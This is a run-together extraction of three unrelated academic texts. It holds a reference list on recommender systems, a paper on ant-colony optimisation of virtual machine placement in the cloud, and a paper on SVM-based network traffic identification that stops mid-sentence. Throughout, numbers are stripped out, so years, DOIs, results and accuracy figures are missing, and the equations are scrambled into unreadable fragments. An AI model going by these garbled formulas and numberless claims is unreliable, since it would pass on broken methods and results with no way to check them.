b, kilani y. . a collaborative filtering recommender system us- ing genetic algorithm. information processing & management ( ): doi . /j.ipm. . . bell rm, koren y. . lessons from the netflix prize challenge. association for com- puting machinery sigkdd explorations newsletter ( ): – doi . / . . chu pm, mao y-s, lee s-j, hou c-l. . leveraging user comments for recommenda- tion in e-commerce. applied sciences ( ): – doi . /app . han h, huang m, zhang y, bhatti ua. . an extended-tag-induced matrix factorization technique for recommender systems. information ( ): doi . /info . idrissi n, zellou a. . a systematic literature review of sparsity issues in recom- mender systems. social network analysis and mining ( ): doi . /s - - - . jonnalagedda n, gauch s, labille k, alfarhood s. . incorporating popularity in a personalized news recommender system. peerj computer science :e doi . /peerj-cs. . kim d-h, abraham a. . a hybrid genetic algorithm and bacterial foraging ap- proach for global optimization and robust tuning of pid controller with disturbance rejection. in: hybrid evolutionary algorithms. berlin, heidelberg: springer, – . koenigstein n, dror g, koren y. . yahoo! music recommendations: modeling music ratings with temporal dynamics and item taxonomy. in: proceedings of the fifth acm conference on recommender systems. new york: acm, – . koren y. . factorization meets the neighborhood: a multifaceted collaborative filtering model. in: proceedings of the th acm sigkdd international conference on knowledge discovery and data mining. new york: acm, – . koren y. . collaborative filtering with temporal dynamics. in: proceedings of the th acm sigkdd international conference on knowledge discovery and data mining. new york: acm, – . li f, xu g, cao l. . two-level matrix factorization for recommender systems. neural computing and applications ( ): – doi . /s - - - . li g, chi m. . expert cf: solving data matrix sparsity and computation complexity problems. transactions on machine learning and artificial intelligence ( ): – . lin j, li y, lian j. . a novel recommendation system via l -regularized convex optimization. neural computing and applications ( ): – doi . /s - - -w. mirbakhsh n, ling cx. . clustering-based factorized collaborative filtering. in: proceedings of the th acm conference on recommender systems. new york: acm, – . nguyen l, do m-pt. . a novel collaborative filtering algorithm by bit mining frequent itemsets. peerj preprints :e v . al-hadi et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /asl. . http://dx.doi.org/ . /j.ipm. . http://dx.doi.org/ . / . http://dx.doi.org/ . /app http://dx.doi.org/ . /info http://dx.doi.org/ . /s - - - http://dx.doi.org/ . /peerj-cs. http://dx.doi.org/ . /s - - - http://dx.doi.org/ . /s - - -w http://dx.doi.org/ . /peerj-cs. nilashi m, ahani a, esfahani md, yadegaridehkordi e, samad s, ibrahim o, sharef nm, akbari e. . preference learning for eco-friendly hotels recommendation: a multi-criteria collaborative filtering approach. journal of cleaner production : – doi . /j.jclepro. . . . nilashi m, bin ibrahim o, ithnin n. . hybrid recommendation approaches for multi-criteria collaborative filtering. expert systems with applications ( ): – doi . /j.eswa. . . . nilashi m, jannach d, bin ibrahim o, ithnin n. . clustering-and regression-based multi-criteria collaborative filtering with incremental updates. information sciences : – doi . /j.ins. . . . rabiu i, salim n, da’u a, osman a. . recommender system based on temporal models: a systematic review. applied sciences ( ): doi . /app . sardianos c, ballas papadatos g, varlamis i. . optimizing parallel collaborative fil- tering approaches for improving recommendation systems performance. information ( ): doi . /info . vo nd, hong m, jung jj. . implicit stochastic gradient descent method for cross- domain recommendation system. sensors ( ): doi . /s . wang j, han p, miao y, zhang f. . a collaborative filtering algorithm based on svd and trust factor. in: international conference on computer, network, communication and information systems (cnci ). atlantis press,. wu x, yuan x, duan c, wu j. . a novel collaborative filtering algorithm of machine learning by integrating restricted boltzmann machine and trust information. neural computing and applications ( ): – doi . /s - - -y. yang d, chen t, zhang w, yu y. . collaborative filtering with short term pref- erences mining. in: proceedings of the th international acm sigir conference on research and development in information retrieval. new york: acm, – . ye f, eskenazi j. . feature-based matrix factorization via long-and short-term interaction. in: knowledge engineering and management. springer, berlin: springer, – . yuan y, zahir a, yang j. . modeling implicit trust in matrix factorization-based collaborative filtering. applied sciences ( ): doi . /app . zainal n, al-hadi iaa-q, ghaleb sm, hussain h, ismail w, aldailamy ay. . predicting mira patients’ performance using virtual rehabilitation programme by decision tree modelling. in: recent advances in intelligent systems and smart applications. cham: springer, – . zhang f, qi s, liu q, mao m, zeng a. a. alleviating the data sparsity problem of recommender systems by clustering nodes in bipartite networks. expert systems with applications ( ): – . zhang l, wei q, zhang l, wang b, ho w-h. b. diversity balancing for two- stage collaborative filtering in recommender systems. applied sciences ( ): doi . /app . al-hadi et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /j.jclepro. . . http://dx.doi.org/ . /j.eswa. . . http://dx.doi.org/ . /j.ins. . . http://dx.doi.org/ . /app http://dx.doi.org/ . /info http://dx.doi.org/ . /s http://dx.doi.org/ . /s - - -y http://dx.doi.org/ . /app http://dx.doi.org/ . /app http://dx.doi.org/ . /peerj-cs. international journal of advanced network monitoring and controls volume , no. , multi objective optimization of virtual machine migration placement based on cloud computing sun hong , , tang qing ,xu liping and chen shiping university of shanghai for science and technology, shanghai china , shanghai key laboratory of modern optical systems, shanghai china corresponding author: sun hong, university of shanghai for science and technology, , shanghai, china email:sunhong@usst.edu.cn abstract. how to improve the resource utilization of the cloud computing system has been one of the key content of the research of the cloud computing. the traditional multi-objective ant colony optimization was improved, studied the virtual machine live migration framework, combined with the elimination method to solve virtual machine migration and placement of multi-objective optimization problem, the load balanced specific strategies are integrated into the framework of a dynamic migration, simulation experiments are carried out and the conclusions are made for it. the algorithm can obtain the optimal solution through the continuous updating of pheromone. the main consideration is the service level contract violation rate(s), resource loss(w),power consumption (p). experimental results show that ,compared with the traditional heuristic method and genetic algorithm, the algorithm is advantageous to the parallel computation, and it’s able to achieve the optimal tradeoff and compromise between multiple conflicting objectives. in the case of service level contract violation rate is low, system resource waste and power consumption are at the least, so it has feasibility. keywords: cloud computing, virtual machine migration, multi objective optimization, ant colony algorithm, elimination method. . introductiong as a new technology, cloud computing has become a hot research topic in the field of information in recent years. as a new business computing model, business characteristics and virtualization technology is its obvious characteristics. and the task scheduling is the key technology of cloud computing, it not only affects the efficiency of the whole system, but also significantly affects the quality of service. at present, the problem of task scheduling is studied in the grid environment. due to the diversity of user requirements in the cloud computing system, and the complexity of the task type, previous task scheduling algorithms can’t meet the requirements of the overall qos. in the dynamic cloud computing environment, improving the efficiency of task scheduling and load balancing is an eternal problem, for users, to meet the user’s qos requirements is the most important thing. therefore, the research on the task scheduling algorithm with qos expectation constraint is the key content of the multi objective optimization of virtual machine migration placement based on cloud computing cloud computing system. nowadays, cloud computing has become a new model to provide access and services through the internet. if the distribution of resources is not reasonable, it will inevitably lead to waste of resources. it is of great significance to realize the multi objective optimization of virtual machine migration and placement in the present stage. most researchers use the traditional heuristic method or genetic algorithm and other algorithms to make the virtual machine placement before; although these algorithms can solve the problem of virtual machine migration in a certain extent, but these algorithms have their own limitations. for example, heuristic method can solve the problem of local optimal solution in virtual machine migration, but the method is short of the ability of global optimization. although genetic algorithm has certain advantages in multi objective optimization, it can’t make full use of the feedback information, so that the search is blind, and the efficiency of solving the optimal solution to a certain extent is relatively low. ant colony optimization, which also called ant algorithm, is a kind of probabilistic algorithm used to find the optimal path in the graph. ant colony optimization is a simulated evolutionary algorithm, a preliminary study shows that the algorithm has many excellent performance. compared with the results of genetic algorithm design, numerical simulation results show that ant colony algorithm has a new simulation evolutionary optimization method and its effectiveness and application value. this paper introduces the management framework of the two layers of local management and global management, through this management framework is conducive to the migration of virtual machine placement and resource allocation to make better decisions. the method used in this paper is to improve the traditional ant colony algorithm, and combine with the exclusion method. it is advantageous to the parallel computation, and the efficiency is higher. to be able to obtain the optimal tradeoff between the three conflicting objectives which are service level contract violation rate(s),resource loss(w) and power consumption(p),and in the case of service level contract violation rate is low, the waste of system resources and power consumption are the least. . overall framework for virtual machine migration . virtual machine migration xen virtual machine is using virtualization technology which is a quasi virtualization technology, and have good performances in all kinds of architecture, it has very good performance and system isolation. up to now, xen is definitely the most outstanding linux system under the open source virtual machine, xen is now no longer originally just supported by x , and now has wild support and even itanium and other hardware platforms are available to it. version was released in , the client can support up to virtual cpu. to use a virtual machine, you should start the operating system, but microsoft platform vmware is the first to enable the physical machine system and then start the process, and this is not the standard. after xen started, the first step is to run the virtual machine monitor, which is xen hypervisor (also known as the super management program in the xen system), then run the host operating system (or local operating system),by minimizing the connection between the super manager and the native operating system, it reduces the risk of super management program itself and the virtual machine being destroyed and information leakage. . overall framework and optimization of virtual machine migration the basic migration structure is implemented by four modules, including migration monitoring, execution migration, suspension and rewake. as shown in figure . international journal of advanced network monitoring and controls volume , no. , monitor migration module: the primary function of the primary module is to determine the source of the migration, the start time of the migration, and the purpose of the migration. the working mode of listening and migrating module is determined by the purpose of migration. in order to ensure the load balance of each node, setting up the monitor signal in the virtual machine management program, according to the monitoring of the various nodes of the load operation to determine whether the need to migrate. set a migration threshold, when monitor to arrive at this value, monitor migration module will send a migration signal to the source, indicates that the source machine will be migrated. meanwhile, monitor the migration module to communicate with other nodes, look for the lower load nodes, and determine the specific location of the destination machine. run migration module: this module is the most important module of virtual machine migration, almost bear most of the migration work. after running the migration, this module collects the running information of the source machine, at the same time to freeze the module by sending the “frozen” signal to the source machine. this process is the key part of the migration process, directly affect the migration process downtime and migration of the total length. freezing module: this module is mainly responsible for how to solve the continuous service problem. it makes users feel not interruptions. target domain wake-up module: the function of the target domain wake-up module is to determine the time to wake up the destination machine, also ensure that the weaken target machine is consistent of the source machine, and how to ensure that the service of the target area is connected with the source area. after it shutdown, the running module will copy the remaining memory pages, then send the “weaken signal” to the weaken module which on the target machine. interrupt connection device is a direct consequence caused by shutdown, peripheral device cannot connect to virtual machine, this, of course, will cause the external service is not timely or appear all kinds of transmission errors. in order to improve the effectiveness of migration, reduce the time of shutdown, increase the application rate of load, we propose an optimized virtual machine dynamic migration framework, this framework is also based on xen. figure. the virtual machine dynamic migration placement module multi objective optimization of virtual machine migration placement based on cloud computing in order to improve the utilization of load, at the same time, it also makes the migration process more smooth and effective, optimization the design of dynamic migration of xen virtual machine. add two modules to achieve load balancing, one of them is the load monitor module, which add to the original monitor migration module, in order to set the identity of the current virtual machine running information, set the trigger conditions for its migration and prepare for the subsequent migration to select the appropriate load; the other one load transfer module is mainly responsible for the positioning and selection strategy of the virtual machine migration. as shown in figure , three modules are marked by grey patterns. figure. dynamic migration of virtual machine placement framework optimization module . virtual machine migration placement policy model a large number of computers will be integrated into resource pool in the cloud computing, then the computing tasks in cloud computing are distributed in the resource pool, all applications can each one takes what he needs, for example, you can have a stronger computing power to meet the needs of computing, you can set aside a larger storage space to store resources, and even more perfect online updates and other software services. in the cloud computing platform, a variety of servers to complete a specific task by way of collaboration. because there is no unified standard for cloud computing platform application interface, the application of the various cloud environments can not be fully integrated, at the same time, the resources of the nodes in the cloud environment are different. for example, the formats provided by the same resource are different, the demands for resources in different time periods are different, there are large number of access to the same node during certain periods of time. this will lead a overload caused by excessive access on a server node in a certain period of time. while the other nodes are less load due to access relatively light, this forms the node utilization rate is not high in the whole system, causing the load is not balanced. virtualization technology continues to mature, this is to provide a solution to this. the emergence of dynamic migration of virtual machine is an effective way to solve the load imbalance. the whole virtual machine running state can smooth and stable mutual transfer between the two physical hosts in the same cluster, of course, this is the necessary conditions for the transfers, and users don’t have any feeling of stagnation. the dynamic migration of virtual machine can assist the maintenance personnel of the cloud environment, so that the nodes in the cluster can be fully used, achieve load balancing dynamically. therefore, to improve the resource allocation in the cloud environment and to strengthen the system by designing an efficient load balancing algorithm, international journal of advanced network monitoring and controls volume , no. , this has become one of the important issues in the field of cloud computing. virtual machines allow all computing tasks to encapsulate into the virtual machine. because the virtual machine is one of the characteristics of isolation, so you can use the virtual machine dynamic migration technology to migrate computing tasks. the scale of cloud computing is generally relatively large, it also provide the same size of the pressure to how to adjust the distribution of the node resources. considering the real time information of resources in cloud environment, resource scheduling must be done, this requires real- time monitoring of resources in the cloud environment, and can dynamically manage. from the point of view of the process size of the task to be migrated, cloud computing users pay more attention to the migration process in the virtual machine itself how to operate, of course, the premise is to try not to affect the user. how to provide resources to the service level agreement of the internal application of the virtual machine is a problem to be solved at present. in terms of practical ability, resource scheduling system must monitor the usage of resources and provide reference for the system itself in time, or for system management related personnel to set. . virtual machine management framework the number of infrastructure nodes in cloud computing is very large, which makes it very difficult to build a structure. the management framework of this paper is two layers of management, local management and global management, the details are shown in figure .the management of host cloud infrastructure to enable global management to run on a host node, by monitoring the collection of various information from local management, including user service quality resource consumption and power consumption, and so on, then make decisions on the placement of the virtual machine and the allocation of resources. figure. virtual machine system management structure . mathematical model of virtual machine migration the migration and placement of virtual machine has been the focus of research in cloud computing, it is a typical bin packing problem. the literature proves that the virtual machine migration is a np-hard problem. according to the framework of system management in figure , in this paper, we need to consider the following factors in the global management of virtual machine initialization: service level contract violation rate(s), resource loss(r), power consumption(p). m, n, respectively, indicating the multi objective optimization of virtual machine migration placement based on cloud computing number of physical nodes and virtual machines, says j-th physical nodes have a corresponding resource capacity, represents the resource capacity of the request of i-th virtual machines. its mathematical model is described as follows: target: ( ) constraint: , [ , , ] n cpu cpu i ij j i r a c j m = ⋅ < =∑  ( ) , [ , , ] n mem mem i ij j i r a c j m = ⋅ < =∑  ( ) , [ , , ] n bw bw i ij j i r a c j m = ⋅ < =∑  ( ) , [ , , ] m ij j a i n = = =∑  ( ) the three objectives of the formula ( ) are service level contract violation rate (s), resource loss (r), and power consumption (p). formula ( - ) constrains the allocation of cpu, memory and network bandwidth resources on each physical node, which will not exceed the capacity of its own. and formula ( ) constrains each virtual machine can only be assigned to a physical node. . multi objective optimization virtual machine migration placement strategy based on ant colony algorithm ant colony algorithm is a kind of technology that can be used to find the optimal solution. the algorithm is widely used in the virtual machine migration and placement problem, and has certain advantages in dealing with combinatorial optimization problems. the following is the specific design steps and process of this article. . fitness function the selection of the stress function is very important in the genetic algorithm. according to the formula ( ), the sub - suitability function is defined, the value of the range is between [ ]  sla violation rate function( slaf ),resource utilization function( resourcef ),power consumption function( powerf ), such as formula ( ) - ( ). . ( ) cpusla cpu u f u e − = + ( ) ( , , )resource cpu mem bw cpu mem bwf u u u u u u= × × ( ) ( ) ( ) cpu power cpu busy idle busy idle cpu u f u p p p p u = × + − × ( ) in the formulas, cpuu 、 memu 、 bwu 、 busyp indicate the cpu, memory, network bandwidth utilization and multiplier factor respectively on the physical node . powerf reflects the amount of effective work in a certain amount of power consumed. international journal of advanced network monitoring and controls volume , no. , taking into account the need to balance the service level contract violation rate (s), resource loss (r), power consumption (p) goals. so the weight value of this paper are set to , and according to the experience in this definition the suitability function is ( , , ) ( ) ( , , ) ( ) cpu mem bw sla cpu resource cpu mem bw power cpu f u u u f u f u u u f u = + + ( ) . pheromone pheromone update rules as shown in formula ( ) - ( ) ( ) bestiu iu iuγ ρ γ γ= − × + ∆ ( ) iu is loaded on the node u( ), , others bestbest jvmf sγ  =    ( ) in the formula, bests is the optimal solution set, ρ is the pheromone volatile coefficient, bestiuγ∆ is the pheromone increment, ( )bestf s is the appropriate degree function. . probability transfer function probability transfer function ( ) ( ) ( ) ( )p ( ) iu iu k iu iuiu k seallowed t t t tt i allowed α β α β γ η γ η  ×  ×= ∈   ∑ , ( ) in the formula, is an information heuristic factor, is the visibility heuristic factor. among them, the gamma _i^cpu, gamma _i^mem, gamma _i^bw are virtual machine i request cpu, memory and network bandwidth of the corresponding resources on the host node u ratio. . the construction of the optimal solution set using the exclusion method to construct the non dominated set is a common method in multi-objective genetic algorithm. in this paper, we use the rule of law and its appropriate improvements to deal with the solution of the ant colony algorithm search process, which can be used to build the paxeto solution set, the process is as follows: step :set the solution set { } , ,cycle nd d d d∗ =  for a loop search, where n is the number of the solution to the search. step :to evaluate each solution vector has sub goals, if id target is better than jd corresponding to other sub goals and sub goals, id and jd were compared to non inferior, concludes that id dominated jd , jd must be removed from the current set of solutions of c, and vice versa. step :and so on, will the solution cycled∗ were compared with each other, to get the optimal solution set cycled ∗ of cycles. multi objective optimization of virtual machine migration placement based on cloud computing step :the cycled∗ and the global optimal solution set bestd are compared according to the exclusion method, and the final non dominated solution is saved to the bests . step :to continue the cycle, when the cycle is over, the global optimal solution set bestd is the pareto optimal solution set. . experimental results and analysis this experiment is done on the c oudsim[ ], cloudsim by rajkumar professor buyya team (melbourne university) developed cloud computing simulator, melbourne university in australia grid laboratory and gridbus project announced the launch of cloud computing simulation software. cloudsim as a generic, scalable new simulation framework that supports seamless modeling and simulation, and can be carried out on the basis of cloud computing infrastructure and management services. this simulation framework has the following characteristics[ ]: simulation and example of a large-scale cloud infrastructure supporting a single physical computing node. to provide an independent platform, the main function is to the modeling of the data center, service agent and scheduling strategy. in a data center node to provide a virtual engine, to manage the independent virtualization services. flexible virtualization services can switch between shared space and shared time processing core allocation policies. in this paper, we use ant colony algorithm for resource allocation, and some other algorithms are compared. experiment set physical nodes, each node is configured for gb l memory, tb storage and bandwidth of gbps, while the capacity of cpu is equivalent to , and mips. the number of requests for a virtual machine is , where the request for cpu is and mips, gb memory, , gb bandwidth, mbps. the power consumption of the physical node in cpu utilization is % and %, respectively. the power consumption is w and w. figure. comparison of sla violation rate and resource waste in placement algorithms international journal of advanced network monitoring and controls volume , no. , figure. comparison of the fitness function value of kinds of placement algorithms figure. comparison of placement algorithms under power consumption . concluding remarks the algorithm used in this paper is an improved ant colony algorithm for distributed multi objective optimization. this algorithm is an improvement of the traditional multi objective ant colony algorithm. selected service level contract violation rate (s), resource consumption (w), power consumption (p) three targets. and combined with the elimination method to solve the virtual machine migration in the placement of these three objectives optimization problem. experimental results show that compared with the traditional heuristic method and genetic algorithm, the proposed algorithm can effectively reduce the resource waste and the power consumption of the system when the service level contract violation rate is low, and it has feasibility. this paper has used the power consumption as one of the management objectives, next, we also need to consider how to take into account the data center network traffic and other aspects, so as to achieve more perfect. references [ ] hyear c,mckee b, gardner r, et al. autonomic virtual machine placement in the data center [j]. hewlett packard laboratories, tech. rep. hpl- - , : - . [ ] li jingchao,chenjingyi,wujie. research on virtual machine placement based on improved grouping genetic algorithm [j]. computer engineering and design, , ( ): - .. [ ] li yong: analysis and research on dynamic migration of virtual machine[dissertation]. national defense multi objective optimization of virtual machine migration placement based on cloud computing science and technology university, . [ ] li zhiwei,wuqingbo,tanyusong. research on dynamic migration of virtual machine based on device agent mechanism. computer application research. twenty-sixth volumes, april . [ ] carey m r,johnson d s. computers and ln tractability: a guide to np-completeness [j]. . [ ] calheiros r n, ranjan r, ct al. cloud sim: a toolkit for modeling and simulation of cloud computing environments and evaluation of resource provisioning algorithms [j]. software: practice and experience, , ( ): - . [ ] sun hong, zhang huaxuan, chen shiping, etal. the study of improved fp-growth algorithm in map reduce[c].//proc.cpci- st international workshop on cloud computing and information security(ccis) cpci: acknowledgements this work was supported by the national natural science foundation of china (no. , no. ), innovation program of shanghai municipal education commission(no. zz ), and the hujiang foundation(c ). biographies sun hong: female, han, -, from beijing, china, master, associate professor, school of optical- electrical and computer engineering university of shanghai for science and technology, master tutor, associate professor direction of research; business schools university of shanghai for science and technology doctor graduate student; the main research direction: computer network communication and clouds computing, management science and engineering, management information and decision support system . email:sunhong@usst.edu.cn,telephone: tang qing: male, han, -, master student, school of optical-electrical and computer engineering university of shanghai for science and technology; the main research direction: cloud computing and management information system.email:qingtang @ .com xu li-ping: female, han, -, master, associate professor, university of shanghai for science and technology; the main research direction: cloud computing and management information system. email: @qq.com chen shi-ping: male, han, -,form zhejiang, china, professor, ph.d., doctoral tutor business schools university of shanghai for science and technology, research direction: computer network communication and clouds computing, management science and engineering. email:chensp@usst.edu.cn international journal of advanced network, monitoring and controls volume , no. , doi: . /ijanmc- - a new method of improving the traditional traffic identification and accuracy wang zhongsheng school of computer science and engineering xi'an technological university xi'an, , shaanxi, china e-mail: wzhsh @ .com gao jiaqiong department of computerscience sichuanvocational andtechnicalcollege suining, , sichuan, china e-mail: @qq.com abstract—as the traffic generated by the increasing number of applications on the internet is becoming more and more complex, how to improve the quality of service and security of the network is also increasingly important. this paper studies the application of support vector machine (svm) in traffic identification to classify network traffic. through data collection and feature generation methods and network traffic feature screening methods, svm is used as a classifier by using the generalization capability, and the parameters and the kernel functions of svm are adjusted and selected based on cross comparison ideas and methods. using the cross-validation method to make the most reasonable statistics for the classification and recognition accuracy of the adjusted support vector machine avoids the situation that the classification accuracy of the support vector machine is unstable or the statistics are inaccurate. finally, a traffic classification and identification system based on svm is implemented. the final recognition rate of encrypted traffic is up to . %, which overcomes the disadvantages of traditional traffic identification and achieves a fairly reliable accuracy. keywords-support vector machine (svm); traffic classification; feature extraction; kernel function i. introduction due to the rapid development of the internet, internet business has greatly facilitated and enriched people's lives, learning and work, and has attracted more and more users. with the new application patterns (such as p p) and application demand emerging in the internet[ ], the pressure of huge data transmission is becoming more and more heavy, and the occurrence of network failures is becoming more and more frequent, which leads to a series of network failures, such as packet loss, network congestion, and time delay in the process of data transmission. the maneuverability of the network is greatly reduced, the normal operation of the network is affected, and huge economic losses are incurred. therefore, how to identify and classify the network traffic in real time helps the internet service provider to understand the network operation status and optimize the network operation and management. it is of great significance. the current popular network traffic identification technologies include traffic identification algorithms based on known ports [ ]; traffic identification based on deep packet (dpi) [ - ]; traffic identification algorithms based on data flow behavior pattern [ ]; traffic identification algorithms based on machine learning and so on. the traffic classification method [ ] has been widely proposed in the past few years. initially, the type of data transmitted over the internet is relatively small. the traffic identification technology is mainly based on port identification. that is, the general network protocol port number [ ] is used to roughly classify traffic. for example, the protocol uses a fixed port. however, with the development of the internet, merely relying on port identification technology has been insufficient to distinguish between more and more network applications and protocols. in , an application layer load signature recognition method, the dpi technology [ ], was proposed to extract the data message samples and determine whether the traffic belongs to the application by matching the signature of the unknown traffic. in recent years, the proportion of network traffic transmitted by encrypted text is increasing. dpi international journal of advanced network, monitoring and controls volume , no. , technology has been powerless for this part of the traffic. at present, the method of network traffic recognition based on machine learning [ ] shows a higher accuracy. machine learning is an important tool for the study of network traffic identification. dong s and others described the current popular machine learning method [ ]. after comparing and evaluating the clustering algorithm [ ], it was found that the feature selection algorithm [ ] was better for supervised machine learning[ , ]. dbscan algorithm [ ] of unsupervised clustering algorithm has higher precision. since the development of a complete classification architecture [ ] for real-time work on high-capacity links is limited, este a[ ] and others after demonstrating the computational time and the optimization steps required to handle different traffic traces, used machine learning techniques(svm model[ ]) to improve system performance and enable real-time traffic identification for high-speed networks. zhao x proposed a p p network traffic classification method based on support vector machine [ ], using a statistical principle to divide the network traffic of four different types of p p traffic applications (file sharing bittorrent, media streaming pplive, internet phone skype, instant messaging msn), and studied network traffic statistics and svm methods. the overall framework of p p traffic classification based on svm was introduced, how to obtain traffic samples and processing methods were described, and the traffic classifier was constructed, with an average accuracy of . %. bernaille l and others divided the traffic classification mechanism into two phases [ ]: offline learning and online classification. the offline learning stage uses the kmeans method [ , , ] to divide the original traffic and give a description of each cluster and its application type; the online learning stage determines the application type of the new traffic according to the learning knowledge. ye m proposed a new method of identifying p p traffic through data transmission behavior of p p applications [ ]. the data downloaded from the p p host finds the shared data of the download stream and the online upload stream, and proposes a content-based partitioning scheme to divide the stream into data blocks. based on the above viewpoints and taking into account the excellent performance of machine learning and svm in solving p p traffic classification problems [ - ], this paper proposes a network traffic two classification method based on svm. which is used to complete the network flow parameters obtained from the packet header after network traffic collection to classify internet traffic into a wide range of application categories. in the selection process of feature vectors, it should be suitable for svm algorithm and try to calculate independently of the protocol and port. therefore, in this paper, we choose the number of packets, size characteristics, data flow time characteristics, flag bits and other information as a preliminary feature vector, through a plurality of classifier selection methods to obtain the optimized feature set. it is used to implement the initial identification of normal traffic in the network, reducing the workload of the feature value matching module, improving the efficiency of the network traffic identification system, and comparing with the method of identifying network traffic that only adopts the feature value matching. the experimental results using the traffic from the campus backbone network show that . % accuracy can be achieved through regular biased training and test samples. when using bias-free training and test samples of the same feature set, an accuracy of . % can be achieved. in addition, since all feature parameters can be calculated from the packet header, the proposed method is also applicable to encrypted network traffic. ii. proposed method a. support vector machine (svm) model svm is a machine learning method that is based on one of the statistical algorithms with good generalization ability. it is mainly used to solve small samples. the feature vectors of the data stream in the network are more or less, and too many features will affect the efficiency and accuracy of the svm algorithm. therefore, to reduce redundant features, feature combinations with high discrimination are selected as feature vectors. after completing the support vector machine international journal of advanced network, monitoring and controls volume , no. , network traffic classification identification code, statistics and evaluation of the operating efficiency and accuracy of the results are also required. the identification of network traffic is essentially a pattern classification process and is mainly divided into the following three points: ) converting the actual problem into the high-dimensional feature space through the kernel function, so that in the high-level space, the hyperplane can be used to classify the data, and the classification decision function is constructed so that the nonlinear problem of the original dimension is converted into linear separable problem. the classification decision function is a linear combination of non-linear functions with support vectors as parameters. the classification function itself is only related to the number of support vectors, so the method of this kind of kernel function is very effective in dealing with the classification problem of high dimensional feature space. ) under the condition that the number of known training samples is small, the network traffic classification is converted into secondary optimization and improve the accuracy of classification. the initial threshold is determined by iterating feature subsets using the inter-class distances and intra-class distances of the features. ) the optimization problem is coded by simulating the natural evolutionary process. the key point of coding is that the code must be able to represent all possible subsets of the feature set. the optimal hyperplane is used to optimize the learning ability of the classifier. this method does not need to rely on the prior probability of the network traffic samples and has better generalization. when using svm, classifiers with better generalization effects can be achieved by defining different kernel functions and relaxation factors. the optimization model is as follows: let the training sample set be: {(xi,yi)},i= , , ,…n; map this sample set to the high-dimensional feature space and achieve regression, the following are obtained: fxωt∅x+b ( ) (ω is the weight vector; b is the offset vector) convert equation ( ) to the minimization problem. the objective function of svm regression is: minω + ci= nδi s.t. yi-ωtx+b=eii= , , ,…n ( ) in this formula, c is the penalty parameter; ei is the regression error. through the lagrangian operator, the corresponding dual problem is obtained as follows: lω,b,δ,α=min|ω| + γi= nδi +i= nαi(ωtx-b+ei-yi) ( ) set the kernel function kxi,xj=(xi)t(xj), then use the nonlinear svm regression model established by the rbf function. there are: fx=i= nαiexp-xi-xj σ +b ( ) (σ is the width of the core) b. finding support vectors in training samples introduce the following rules to distinguish. set the threshold of the support vector decision function λ= or λ=- , assume that the decision function in the detection process isfx=sgn{i= n[aikxi,x-sidi§]}, f (x)≠ or f(x)≠- , the x vector does not belong to the support vector or the x vector belongs to the support vector. an initial support vector library trained from known flows. after the known flow rate is trained by the data acquisition module, the feature extraction module, the data preprocessing module, and the training module, a support vector is generated to perform feature analysis, and its characteristic word information is added to the support vector library. various known p p traffic passes through the above process eventually forms a multidimensional support vector group, and a known support vector library is also formed. finally, the msvm threshold is determined. if the threshold is equal to (or - ), the detected network traffic is p p traffic; otherwise, the detected network traffic is non-p p traffic. when selecting p p traffic characteristics, the feature extraction should be able to reflect the difference of p p international journal of advanced network, monitoring and controls volume , no. , traffic as much as possible. different nodes in the network have different functions: some nodes function as servers and provide resource transmission services to other nodes in the network. some nodes function as clients and receive various services provided by the server. the nodes in the p p network can serve as servers to other peer nodes, and can also serve as clients to receive services provided by other peer nodes. therefore, node traffic with different functions and providing different services presents different behavior characteristics. c. support vector machine network traffic identification process the network traffic identification based on vector machine is essentially making full use of the powerful capability of svm to deal with non-linear multi-factor system to mine the internal rules and establish the complex non-linear relationship of network traffic change, so as to achieve accurate network traffic prediction. in the learning and classification process of the svm model, the selection of kernel functions plays a decisive role in the training and classification performance. at present, several frequently studied kernel functions are: linear kernel, rbf(radical basis function) kernel and gaussian kernel and so on. in this paper, rbf kernel is selected as the kernel function. the overall strategy when selecting the kernel function and adjusting parameters is approximately the following steps: preparing a batch of classified data; splitting the data into two groups: a training group and a test group; using a training group to give a support vector machine for training and learning; the support vector machine predicts the classification of test group data and compares it with the actual classification of the number of test groups, calculates the classification accuracy, replaces the parameters, and then iterates again. if we do not use the cross comparison idea, it is very easy to cause the prediction result to be very good only in the case of a specific input. in other cases, the prediction of the parameter is not stable. d. p p traffic classification model based on svm figure shows the classification framework based on svm in this paper. this paper firstly extracts and analyzes the traffic to extract several main characteristics of network traffic that are suitable for recognition in the support vector machine. then, the data is preprocessed, and the known data set for the target problem is set as a training data set, and use an iterative process to train a classification model. the parameters of the model are continuously adjusted by a method of random optimization or analysis, so that it is closest to the actual situation of the training data set. after the model is trained, it can be used to identify unknown samples and dynamically adjust the training sample data by continuously searching for useful training samples to realize the entire network traffic identification based on svm. figure . classification framework based on svm theoretical model ) collector: using port mirroring method to collect data from routers and collect data as raw data and preprocess them. multiple harvesters can be connected in parallel or in series. international journal of advanced network, monitoring and controls volume , no. , ) analyzer: the raw data preprocessed by the collector is subjected to a data feature extraction module to extract the characteristic function parameters. stored in data warehouse. an analyzer can analyze the data of multiple collectors. after the data is preprocessed, the grid search method can be used to verify the optimal parameters of the rbf kernel function for the training data set. so that the analyzer can accurately predict unknown data. ) after the optimal parameters are determined, the training data set can be trained to obtain the support vector machine model. the extracted parameter data is taken as the feature value of the original data, and the continuous features and discrete features existing in the data are converted, and these heterogeneous data sets are translated into machine-readable values by the data preprocessing module. ) multidimensional support vectors are generated by the data after svm training. at the same time, the multidimensional support vectors are formed through the process of different p p traffic data, and one support vector library is formed. ) known p p traffic can get specific p p type through svm library. unknown p p traffic will be subjected to data preprocessing and svm training by the data acquisition device and analyzer extraction feature extraction module, and the extracted feature information will be added to the svm support vector library. after obtaining the specific name of the traffic, it is put into the svm support vector library and finally identifies the specific p p traffic. the initial svm support vector library is a vector library that is trained by known traffic. when the known traffic is subjected to initial data acquisition and feature extraction, data preprocessing, and svm training, multidimensional support vectors are generated, multidimensional support vectors are characterized, and their characteristic information is added to the svm support vector library. known traffic can also form a multidimensional support vector group through the above process. iii. experiments a. traffic data collection select a network server outlet network traffic to carry on the simulation experiment, take ms as the sampling time, select the total number of data packets, uplink traffic ratio, average length, tcp traffic ratio and the ratio of the number of connections and different ip number five traffic characteristics as input data feature information, set up the data set as a training sample set and separate and collate, and preprocess the collected data and normalize it. the collected data samples are shown in table . table i. collected data samples dataset time (ms) total flow dataseta hour datasetb hour datasetc hour datasetd hour datasete day among them, the first four sets of data are used as input data for the training module. datasete is used as the data set to be tested. three support vector machines are constructed here, namely svm , svm 